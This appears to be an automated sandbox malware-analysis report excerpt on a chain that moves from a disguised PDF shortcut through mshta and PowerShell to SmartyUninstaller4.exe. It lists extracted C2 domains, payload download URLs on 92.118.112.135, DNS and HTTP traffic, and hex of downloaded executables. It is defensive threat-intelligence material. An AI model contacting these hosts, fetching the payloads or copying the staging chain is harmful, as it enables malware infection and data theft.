Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 15_2_02A8CCB0
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movsx esi, byte ptr [edx] 15_2_02AB7CCA
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp byte ptr [esi], 00000000h 15_2_02A93C08
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 15_2_02A97864
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp ecx 15_2_02AB5D98
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 15_2_02A96D24
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [ecx], al 15_2_02AA7D6E
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esp] 15_2_02A93D70

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: proffyrobharborye.xyz
Source: Malware configuration extractor URLs: panameradovkews.xyz
Source: Malware configuration extractor URLs: aplointexhausdh.xyz
Source: Malware configuration extractor URLs: manufactiredowreachhd.xyzu
Source: Malware configuration extractor URLs: slammyslideplanntywks.xyzu
Source: Malware configuration extractor URLs: depositybounceddwk.xyz
Source: Malware configuration extractor URLs: exertcreatedadnndjw.xyz
Source: Malware configuration extractor URLs: compilecoppydkewsw.xyz
Source: Malware configuration extractor URLs: radiationcommentwks.xyz
Source: Malware configuration extractor URLs: proffyrobharborye.xyz
Source: Malware configuration extractor URLs: panameradovkews.xyz
Source: Malware configuration extractor URLs: aplointexhausdh.xyz
Source: Malware configuration extractor URLs: manufactiredowreachhd.xyzu
Source: Malware configuration extractor URLs: slammyslideplanntywks.xyzu
Source: Malware configuration extractor URLs: depositybounceddwk.xyz
Source: Malware configuration extractor URLs: exertcreatedadnndjw.xyz
Source: Malware configuration extractor URLs: compilecoppydkewsw.xyz
Source: Malware configuration extractor URLs: radiationcommentwks.xyz
Source: Malware configuration extractor URLs: proffyrobharborye.xyz
Source: Malware configuration extractor URLs: panameradovkews.xyz
Source: Malware configuration extractor URLs: aplointexhausdh.xyz
Source: Malware configuration extractor URLs: manufactiredowreachhd.xyzu
Source: Malware configuration extractor URLs: slammyslideplanntywks.xyzu
Source: Malware configuration extractor URLs: depositybounceddwk.xyz
Source: Malware configuration extractor URLs: exertcreatedadnndjw.xyz
Source: Malware configuration extractor URLs: compilecoppydkewsw.xyz
Source: Malware configuration extractor URLs: radiationcommentwks.xyz
Performs DNS queries to domains with low reputation
Source: DNS query: radiationcommentwks.xyz
Source: DNS query: compilecoppydkewsw.xyz
Source: DNS query: exertcreatedadnndjw.xyz
Source: DNS query: depositybounceddwk.xyz
Source: DNS query: slammyslideplanntywks.xyz
Source: DNS query: manufactiredowreachhd.xyz
Source: DNS query: aplointexhausdh.xyz
Source: DNS query: panameradovkews.xyz
Source: DNS query: proffyrobharborye.xyz
Source: DNS query: proffyrobharborye.xyz
Source: DNS query: proffyrobharborye.xyz
Source: DNS query: proffyrobharborye.xyz
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 10:52:30 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 26 Jun 2024 15:01:40 GMTETag: "291d2-61bcc4aaf6b72"Accept-Ranges: bytesContent-Length: 168402Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9b fe f6 3a df 9f 98 69 df 9f 98 69 df 9f 98 69 3b ef 9d 68 de 9f 98 69 3b ef 9b 68 de 9f 98 69 3b ef 9c 68 ca 9f 98 69 3b ef 99 68 d0 9f 98 69 df 9f 99 69 5a 9f 98 69 3b ef 90 68 dd 9f 98 69 3b ef 67 69 de 9f 98 69 3b ef 9a 68 de 9f 98 69 52 69 63 68 df 9f 98 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e4 e4 aa 2c 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1a 00 52 00 00 00 38 00 00 00 00 00 00 80 58 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 c0 00 00 00 04 00 00 bf 81 00 00 02 00 40 c1 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 82 00 00 a0 00 00 00 00 90 00 00 a0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 94 07 00 00 a0 15 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 1c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc 51 00 00 00 10 00 00 00 52 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 80 0f 00 00 00 70 00 00 00 02 00 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 9e 0d 00 00 00 80 00 00 00 0e 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a0 11 00 00 00 90 00 00 00 12 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 07 00 00 00 b0 00 00 00 08 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 10:52:35 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 26 Jun 2024 14:56:07 GMTETag: "d58ca8-61bcc36d91c78"Accept-Ranges: bytesContent-Length: 13995176Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 ef 11 67 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 02 19 00 74 0a 00 00 1a 03 00 00 00 00 00 bc 83 0a 00 00 10 00 00 00 90 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 13 00 00 04 00 00 58 cd d5 00 02 00 00 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 70 0b 00 71 00 00 00 00 50 0b 00 ec 0f 00 00 00 a0 0b 00 00 c0 07 00 00 00 00 00 00 00 00 00 20 64 d5 00 88 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00 c2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 71 00 00 00 00 70 0b 00 00 02 00 00 00 c4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 18 00 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 5d 00 00 00 00 90 0b 00 00 02 00 00 00 c6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 c0 07 00 00 a0 0b 00 00 c0 07 00 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /agreement.pdf HTTP/1.1Host: 92.118.112.135Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SmartyUninstaller4.exe HTTP/1.1Host: 92.118.112.135
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 96.17.64.189 96.17.64.189
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GUDAEV-ASRU GUDAEV-ASRU
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: radiationcommentwks.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: panameradovkews.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: proffyrobharborye.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: depositybounceddwk.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: aplointexhausdh.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: manufactiredowreachhd.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: compilecoppydkewsw.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: slammyslideplanntywks.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: exertcreatedadnndjw.xyz replaycode: Name error (3)
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic HTTP traffic detected: GET /carrieragreement HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 92.118.112.135Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: unknown TCP traffic detected without corresponding DNS query: 92.118.112.135
Source: global traffic HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic HTTP traffic detected: GET /carrieragreement HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 92.118.112.135Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /agreement.pdf HTTP/1.1Host: 92.118.112.135Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SmartyUninstaller4.exe HTTP/1.1Host: 92.118.112.135
Source: global traffic DNS traffic detected: DNS query: radiationcommentwks.xyz
Source: global traffic DNS traffic detected: DNS query: compilecoppydkewsw.xyz
Source: global traffic DNS traffic detected: DNS query: exertcreatedadnndjw.xyz
Source: global traffic DNS traffic detected: DNS query: depositybounceddwk.xyz
Source: global traffic DNS traffic detected: DNS query: slammyslideplanntywks.xyz
Source: global traffic DNS traffic detected: DNS query: manufactiredowreachhd.xyz
Source: global traffic DNS traffic detected: DNS query: aplointexhausdh.xyz
Source: global traffic DNS traffic detected: DNS query: panameradovkews.xyz
Source: global traffic DNS traffic detected: DNS query: proffyrobharborye.xyz
Source: mshta.exe, 00000003.00000003.2278880978.0000029B42762000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2273118498.000002A348C5F000.00000004.00000020.00020000.00000000.sdmp, CarrierAgreement.pdf.lnk.mal.lnk String found in binary or memory: http://92.118.112.135/carrieragreement
Source: powershell.exe String found in binary or memory: http://92.118.112.135/carrieragreement$global:?
Source: mshta.exe, 00000003.00000002.2280276180.0000029B427D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2278994383.0000029B427D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2276744476.0000029B427D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2280014785.0000029B42762000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2278880978.0000029B42762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreement...
Source: mshta.exe, 00000003.00000002.2280276180.0000029B427D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2278994383.0000029B427D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2276744476.0000029B427D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreement0
Source: mshta.exe, 00000003.00000002.2279786801.0000029B42710000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreement2
Source: mshta.exe, 00000003.00000002.2280276180.0000029B427D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2278994383.0000029B427D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2276744476.0000029B427D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2279786801.0000029B42710000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementC:
Source: mshta.exe, 00000003.00000002.2280816020.0000029B429A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementH
Source: mshta.exe, 00000003.00000002.2280861251.0000029B429B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementLE_STRING=I1
Source: mshta.exe, 00000003.00000002.2280014785.0000029B42762000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2278880978.0000029B42762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementS
Source: mshta.exe, 00000003.00000002.2280014785.0000029B42762000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2278880978.0000029B42762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementc
Source: mshta.exe, 00000003.00000002.2279940696.0000029B42737000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2279174767.0000029B42737000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreemente
Source: mshta.exe, 00000003.00000002.2280014785.0000029B42762000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2278880978.0000029B42762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementeLMEMP
Source: mshta.exe, 00000003.00000003.2277461242.000002A347DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementhttp://92.118.112.135/carrieragreement
Source: mshta.exe, 00000003.00000003.2273118498.000002A348C5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementl;
Source: forfiles.exe, 00000000.00000002.1683395492.000001FFEA2A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementles(x86)=C
Source: mshta.exe, 00000003.00000002.2280014785.0000029B42762000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2278880978.0000029B42762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementlper.dllV
Source: mshta.exe, 00000003.00000002.2279940696.0000029B42737000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2279174767.0000029B42737000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreementt
Source: mshta.exe, 00000003.00000002.2279940696.0000029B42737000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2279174767.0000029B42737000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://92.118.112.135/carrieragreement~
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A0.8.dr String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: svchost.exe, 00000004.00000002.2921585254.000001463A800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000004.00000003.1694309548.000001463A6E8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000004.00000003.1694309548.000001463A6E8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000004.00000003.1694309548.000001463A6E8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000004.00000003.1694309548.000001463A71D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://subca.ocsp-certum.com02
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://subca.ocsp-certum.com05
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aplointexhausdh.xyz/
Source: SmartyUninstaller4.exe, 0000000F.00000003.2052648578.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000002.2057940746.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aplointexhausdh.xyz/api
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aplointexhausdh.xyz/apiH0
Source: SmartyUninstaller4.exe, 0000000F.00000003.2052648578.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000002.2057940746.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aplointexhausdh.xyz/apihd
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://depositybounceddwk.xyz/
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://depositybounceddwk.xyz/60
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://depositybounceddwk.xyz/e0
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://depositybounceddwk.xyz/~0
Source: svchost.exe, 00000004.00000003.1694309548.000001463A792000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.4.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.4.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.4.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1694309548.000001463A792000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
